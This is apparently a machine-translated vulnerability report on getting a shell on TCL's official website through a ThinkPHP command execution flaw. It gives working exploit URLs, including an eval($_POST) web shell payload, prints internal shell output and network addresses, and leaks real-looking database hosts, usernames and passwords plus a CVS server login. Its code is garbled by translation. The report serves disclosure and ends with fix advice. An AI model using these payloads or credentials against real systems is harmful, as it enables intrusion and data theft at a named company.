Getshell is caused by command execution on the TCL official website (internal network is supported, and only one piece of information is provided)

Getshell caused by command execution on the TCL Official Website

1. Main Site Command Execution

It is the command execution vulnerability of thinkphp. It has not been fixed for so long, and maintenance personnel should be able to launch pp.

Http://www.tcl.com/new/1735.html/abc/abc/abc/?#@phpinfo ()}

Http://www.tcl.com/new/1735.html/abc/abc/abc/410%7b@print (eval ($ _ POST [c]) % 7D getshell

Laizhang Diagram

 

Intranet Information

 

[/var/www/html/tcl/]$ whoamiapache[/var/www/html/tcl/]$ ifconfigeth0      Link encap:Ethernet  HWaddr 00:1B:21:BA:99:B0            UP BROADCAST MULTICAST  MTU:1500  Metric:1          RX packets:0 errors:0 dropped:0 overruns:0 frame:0          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)eth1      Link encap:Ethernet  HWaddr 00:1B:21:BA:99:B2            UP BROADCAST MULTICAST  MTU:1500  Metric:1          RX packets:0 errors:0 dropped:0 overruns:0 frame:0          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)eth2      Link encap:Ethernet  HWaddr 40:F2:E9:29:38:D2            inet addr:10.4.22.72  Bcast:10.4.255.255  Mask:255.255.0.0          inet6 addr: fe80::42f2:e9ff:fe29:38d2/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:291345943 errors:0 dropped:0 overruns:0 frame:0          TX packets:420280104 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:56145622678 (52.2 GiB)  TX bytes:489393736613 (455.7 GiB)          Memory:91580000-915a0000

Intranet Sensitive Information Leakage

Rummaging through the Directory and finding a lot of information on the Intranet

1. n multi-database account password Leakage

 

<? Phpswitch ($ _ SERVER ["HTTP_HOST"]) {case "localhost: 8080": {// local $ db_host = "localhost"; $ db_name = "tcl "; $ db_user = 'root'; $ db_pass = 'root'; $ db_name_en = "tcl_en"; $ cache_type = "File"; $ url_model = 2; $ html_cache = false; $ temp_my_cache = false; break;} case "10.4.21.23": {// test $ db_host = "10.4.21.20"; $ db_name = "tcl"; $ db_user = 'tcladmin '; $ db_pass = '000000'; $ db_host_en = "10.4.21.20"; $ db_name_en = "tcl _ En "; $ cache_type =" File "; $ url_model = 2; $ html_cache = false; $ temp_my_cache = false; break;} case" 10.4.21.24 ": {// Test 2 $ db_host = "10.4.21.20"; $ db_name = "tcl"; $ db_user = 'tcladmin'; $ db_pass = '000000'; $ db_host_en = "10.4.21.20 "; $ db_name_en = "tcl_en"; $ cache_type = "File"; $ url_model = 2; $ html_cache = false; $ temp_my_cache = false; break;} case "10.4.22.72 ": {// official $ db_host = "10.4.22.71"; $ db_name = "tcl "; $ Db_user = 'tcl _ admin'; $ db_pass = 'zpw @ 8b! Gurvu '; $ db_host_en = "10.4.22.71"; $ db_name_en = "tcl_en"; $ cache_type = "File"; $ url_model = 2; $ html_cache = false; $ temp_my_cache = false; break;} case "10.4.22.73": {// officially 2 $ db_host = "10.4.22.71"; $ db_name = "tcl"; $ db_user = 'tcl _ admin '; $ db_pass = 'zpw @ 8b! Gurvu '; $ db_host_en = "10.4.22.71"; $ db_name_en = "tcl_en"; $ cache_type = "File"; $ url_model = 2; $ html_cache = false; $ temp_my_cache = false; break;} default: {// official $ db_host = "10.4.22.71"; $ db_name = "tcl"; $ db_user = 'tcl _ admin'; $ db_pass = 'zpw @ 8b! Gurvu '; $ db_host_en = "10.4.22.71"; $ db_name_en = "tcl_en"; $ cache_type = "File"; $ url_model = 2; $ html_cache = false; $ temp_my_cache = true; break ;}}?>

2. a subdomain name website cvs information leakage is provided.

Http://multimedia.tcl.com/cn/investor/CVS/Root

Http://multimedia.tcl.com/CVS/Root

Http://multimedia.tcl.com/en/home/CVS/Root

 

:sspi:mars.ho@source.loko-asia.com:2401/cvsdata

 

Solution:

1. Upgrade

2. Change the password. No other hackers have been there before. You must change the password. Those Black Hat hackers are definitely not vegetarian.